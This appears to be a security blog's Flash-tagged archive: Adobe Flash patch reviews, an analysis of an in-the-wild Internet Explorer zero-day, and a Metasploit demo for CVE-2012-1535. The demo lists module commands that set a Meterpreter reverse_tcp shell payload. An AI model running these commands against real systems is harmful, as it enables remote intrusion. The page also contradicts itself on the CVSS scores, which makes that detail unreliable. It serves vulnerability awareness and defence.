Tag Archives: Flash

APSB12-22 – Adobe October 2012 Patch Tuesday Review

Adobe has released, on 8 October 2012, during its October Patch Tuesday, one security bulletin dealing with 25 vulnerabilities. This security bulletin has a Critical severity rating, and all of these vulnerabilities have a CVSS base score of 10.0.

APSB12-22 – Security updates available for Adobe Flash Player

APSB12-22 concerns:

  • Adobe Flash Player 11.4.402.278 and earlier versions for Windows
  • Adobe Flash Player 11.4.402.265 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.238 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.17 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.16 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.4.0.2540 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.4.0.2540 SDK (includes AIR for iOS) and earlier versions
  • Adobe AIR 3.4.0.2540 and earlier versions for Android

CVE-2012-5248 (CVSS base score of 10.0), CVE-2012-5249 (CVSS base score of 10.0), CVE-2012-5250 (CVSS base score of 10.0), CVE-2012-5251 (CVSS base score of 10.0), CVE-2012-5252 (CVSS base score of 10.0), CVE-2012-5253 (CVSS base score of 10.0), CVE-2012-5254 (CVSS base score of 10.0), CVE-2012-5255 (CVSS base score of 10.0), CVE-2012-5256 (CVSS base score of 10.0), CVE-2012-5257 (CVSS base score of 10.0), CVE-2012-5258 (CVSS base score of 10.0), CVE-2012-5259 (CVSS base score of 10.0), CVE-2012-5260 (CVSS base score of 10.0), CVE-2012-5261 (CVSS base score of 10.0), CVE-2012-5262 (CVSS base score of 10.0), CVE-2012-5263 (CVSS base score of 10.0), CVE-2012-5264 (CVSS base score of 10.0), CVE-2012-5265 (CVSS base score of 10.0), CVE-2012-5266 (CVSS base score of 10.0), CVE-2012-5267 (CVSS base score of 10.0), CVE-2012-5268 (CVSS base score of 10.0), CVE-2012-5269 (CVSS base score of 10.0), CVE-2012-5270 (CVSS base score of 10.0) and CVE-2012-5271 (CVSS base score of 10.0) have been discovered and reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

CVE-2012-5272 (CVSS base score of 10.0) has been discovered and reported by instruder of Code Audit Labs of vulnhunt.com.

All these vulnerabilities have, at this moment, unknown CVSS 2.0 base scores, but could lead to code execution.

I advise you to update your Adobe Flash Player as soon as possible.

Zero-Day Season Is Really Not Over Yet

I can confirm that the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is actually being exploited in the wild.

First I would like to thank the nice people (@binjo, @_sinn3r and all the guys of the Metasploit IRC channel on freenode) who helped me to understand and go further in my investigations.

Second, I would like to clarify some points:

  • I wasn’t a target of the 0day; I tested it in my lab. This misunderstanding was introduced by Reuters in their press release.
  • I did this research on my personal time, and this research is not linked to my professional activities. This misunderstanding was introduced by Reuters in their press release.
  • I don’t pin the responsibility on the Nitro gang; if you read my blog post, you will see that I found coincidences.
  • I don’t know the timeline of the vulnerability, including when it was discovered and how long it has been exploited.

Since the release of the Java SE 7 0day I have been monitoring some of the infected servers used by the alleged Nitro gang (take a look at the updates at the end of the blog post). On the morning of 14 September, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).

As seen in the following screenshot, 4 files were hosted in this folder, and, being a curious man, I downloaded everything to see what these files were related to.

I tested these files on an up-to-date Microsoft Windows XP Pro SP3 with an up-to-date Adobe Flash (11,4,402,265). Surprise: they dropped files on my test computer (see the demonstration video below)! A new 0day? I then decided to take a deeper look at the grabbed files.

exploit.html

This file is recognized as an HTML file and detected by 0 anti-viruses on VirusTotal (9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5).

“exploit.html” is the entry point of the attack. This file creates an array of “img” elements and loads the “Moh2010.swf” Flash file.

Moh2010.swf

This file is recognized as a Macromedia Flash Player movie and detected by 0 anti-viruses on VirusTotal (70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125).

You can observe that the file is packed by DoSWF and that it is decompressed in memory. After decompression, the “Moh2010.swf” file sprays the heap and evals an iframe pointing to the “Protect.html” file.

The ActionScript embedded in the original packed SWF file is also interesting; you will see some special encoding (Chinese?).

The decoded SWF file is known as “Exploit:SWF/CVE-2010-2884.B” or “SWF:Dropper” on VirusTotal (dd41efa629c7f7f876362c5ca6d570be6b83728a2ce8ecbef65bdb89cb402b0f) and detected by only 3/34 anti-viruses. Thanks to binjo.

During exploitation, this file also checks whether the web site is present in the Flash Website Storage Settings panel, in order to no longer load the “Protect.html” file. This means that once infected, the user will no longer be exploited despite further visits to the web site.

Screenshot: display on the first visit (characters displayed on the first visit)

Screenshot: display on successful exploitation

Screenshot: display on further visits

Protect.html

This file is recognized as an HTML file and detected by 0 anti-viruses on VirusTotal (2a2e2efffa382663ba10c492f407dda8a686a777858692d073712d1cc9c5f265).

If you take a look at the source code, you can see interesting JavaScript code which manipulates the “img” array created by “exploit.html”.

You will also see that tests are done in order to target Windows XP 32-bit and Internet Explorer 7 or 8.

111.exe

This file is recognized as an Autodesk FLIC image file and detected by 0 anti-viruses on VirusTotal (a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9).

Submitted to Malware Tracker (baabd0b871095138269cf2c53b517927), this file looks suspicious and requires further investigation. “111.exe” is packed, and after decoding the file is still not detected by any anti-virus on VirusTotal (a6086c16136ea752fc49bc987b8cc9e494384f372ddfdca85c2a5b7d43daa812). But with a Malwr analysis, you can see that this file is recognized as installing a program to run automatically at logon.

Conclusion

The guys who developed this new 0day were not happy to have been caught; they removed all the files from the source server 2 days after my discovery. More interestingly, they also removed a Java 0day variant from other folders.

I also submitted all this stuff to different people in order to confirm the strangeness of this exploit, and we got some good feedback.

Updates

Sunday 09/16:

The Metasploit team is planning to release an exploit module on Monday. This module seems to work very well.

Monday 09/17:

Metasploit has released an exploit module, “ie_execcommand_uaf”, and this module is working for IE 7/8/9 on XP/Vista/7.

AlienVault Labs has provided some additional information regarding the DoSWF file and the C&C server, aka “12.163.32.15”.

Microsoft has released MSA-2757760 and recommends installing EMET (Enhanced Mitigation Experience Toolkit) 3.0 and other mitigation solutions.

Tuesday 09/18:

AlienVault Labs has provided more details on the potential source of the attack.

It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.

Wednesday 09/19:

AlienVault Labs has reported a variant of the “Protect.html” file, named “Dodge.html”, which is now also infecting Windows 7 32-bit running Java 6 with Internet Explorer 9, and confirms the usage of the 0day in targeted attacks.

Microsoft proposes a Fix it solution, KB2757760, “Prevent Memory Corruption via ExecCommand in Internet Explorer”, that prevents exploitation of this issue.

Microsoft has published an advance notification, “Microsoft Security Bulletin Advance Notification for September 2012”, for one out-of-band security bulletin that Microsoft intends to release on September 21, 2012. The bulletin will address security vulnerabilities in Internet Explorer. The vulnerability also affects Internet Explorer on Windows Server 2003 and 2008.

Friday 09/21:

Microsoft has released the promised update, MS12-063, in order to fix the 0day vulnerability. If you use Internet Explorer, I advise you to update as soon as possible!

Adobe APSB12-19 Flash Player Update Review

Adobe has released, on 21 August 2012, just one week after its Patch Tuesday release, an out-of-band patch, APSB12-19, updating Flash Player 10.x and 11.x. This update corrects 6 vulnerabilities; all of them have a Critical severity rating and 5 of the 6 have a CVSS base score of 10.0.

CVE-2012-4163, with a CVSS base score of 10.0, which could lead to code execution, has been discovered and privately reported by Xu Liu of Fortinet’s FortiGuard Labs.

CVE-2012-4164, with a CVSS base score of 10.0, which could lead to code execution, has been discovered and privately reported by Will Dormann of CERT.

CVE-2012-4165 and CVE-2012-4166, both with a CVSS base score of 10.0, which could lead to code execution, have been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs.

CVE-2012-4167, with a CVSS base score of 10.0, which could lead to code execution, has been discovered and privately reported by Alexander Gavrun through iDefense’s Vulnerability Contributor Program.

CVE-2012-4168, with a CVSS base score of 4.3, which could lead to an information leak, has been discovered and privately reported by Opera Software ASA.

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Timeline:

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor on 2012-08-14
Metasploit PoC provided on 2012-08-17

PoC provided by:

Alexander Gavrun
juan vazquez
sinn3r

Reference(s):

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s):

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome, versions earlier than 21.0.1180.79.
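The per-platform “and earlier versions” ceilings listed above, and the ones in the APSB12-22 list at the top of this page, are easy to misjudge when Flash reports its own version with commas (11,4,402,265) or when versions are compared as strings. The following Python check is added here and is not part of the post or of Metasploit; it transcribes both bulletins' ceilings from the page and answers whether a given install is still affected.

```python
"""Patch-compliance check against the "<version> and earlier" ceilings that
APSB12-22 and APSB12-18 (the bulletin behind CVE-2012-1535) give per platform."""
from typing import List, Tuple

# Highest affected version per bulletin and platform, transcribed from the post.
AFFECTED_CEILINGS = {
    "APSB12-22": {
        "windows": "11.4.402.278",
        "macintosh": "11.4.402.265",
        "linux": "11.2.202.238",
        "android4": "11.1.115.17",
        "android2-3": "11.1.111.16",
    },
    "APSB12-18": {
        "windows": "11.3.300.270",
        "macintosh": "11.3.300.270",
        "linux": "11.2.202.236",
    },
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn a Flash version string into a tuple of ints.
    Flash reports its own version with commas ("11,4,402,265", as quoted in
    the post) while the bulletins use dots; both forms are accepted, and the
    comparison is numeric rather than lexical, so 11.4.402.9 < 11.4.402.10.
    """
    parts = text.strip().replace(",", ".").split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Flash version string: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(bulletin: str, platform: str, installed: str) -> bool:
    """True when `installed` is at or below the bulletin's ceiling for `platform`.
    Everything below the ceiling counts as affected too, because each bulletin
    lists "<version> and earlier versions".
    """
    ceiling = AFFECTED_CEILINGS[bulletin][platform.lower()]
    return parse_version(installed) <= parse_version(ceiling)


def bulletins_pending(platform: str, installed: str) -> List[str]:
    """Every bulletin in the table that still applies to this install."""
    return [name for name, ceilings in AFFECTED_CEILINGS.items()
            if platform.lower() in ceilings
            and is_affected(name, platform, installed)]
```

The 11.3.300.268 build used in the demo below is reported as pending both bulletins, while the 11,4,402,265 Mac build from the zero-day post is still at the APSB12-22 ceiling.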

Tested on Windows 7 Integral with:

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description:

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands:

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid